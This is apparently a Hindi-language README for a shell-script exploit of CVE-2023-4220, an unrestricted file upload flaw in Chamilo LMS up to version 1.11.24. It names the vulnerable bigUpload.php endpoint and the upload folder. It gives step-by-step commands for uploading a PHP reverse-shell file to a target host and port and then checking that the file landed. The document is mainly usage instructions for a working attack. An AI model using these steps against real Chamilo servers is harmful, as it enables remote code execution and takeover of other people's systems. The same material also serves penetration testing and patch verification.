
CVE-2023-4220 के लिए शेल-आधारित एक्सप्लॉइट जो Chamilo LMS में अप्रतिबंधित फ़ाइल अपलोड को लक्षित करता है। कमजोर इंस्टेंस पर रिवर्स शेल निष्पादित करने के लिए मनमानी फ़ाइलें अपलोड करता है।
यह एक्सप्लॉइट Chamilo-LMS में अप्रतिबंधित फ़ाइल अपलोड कमजोरी को प्रदर्शित करता है। यह कमजोरी बड़ी फ़ाइल अपलोड कार्यक्षमता को प्रभावित करती है, जो यहाँ स्थित है:
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
प्रभावित संस्करण: Chamilo LMS <= v1.11.24
यह कमजोरी मनमानी फ़ाइलों को यहाँ अपलोड करने की अनुमति देती है:
/main/inc/lib/javascript/bigupload/files/
पहले, एक्सप्लॉइट को निष्पादन योग्य बनाएं और उपयोग जानकारी देखें:
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
आवश्यक पैरामीटर के साथ एक्सप्लॉइट चलाएं:
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
अपलोड की गई फ़ाइल को यहाँ सत्यापित करें:
http://target.test/main/inc/lib/javascript/bigupload/files/
-f: अपलोड करने के लिए फ़ाइल निर्दिष्ट करें-h: लक्ष्य होस्ट URL-p: कनेक्शन के लिए पोर्ट नंबर./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
यह कमजोरी Chamilo LMS के फ़ाइल अपलोड तंत्र में मौजूद है, जो बड़ी फ़ाइल अपलोड कार्यक्षमता में अपलोड की गई फ़ाइलों को उचित रूप से मान्य नहीं करता है।
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/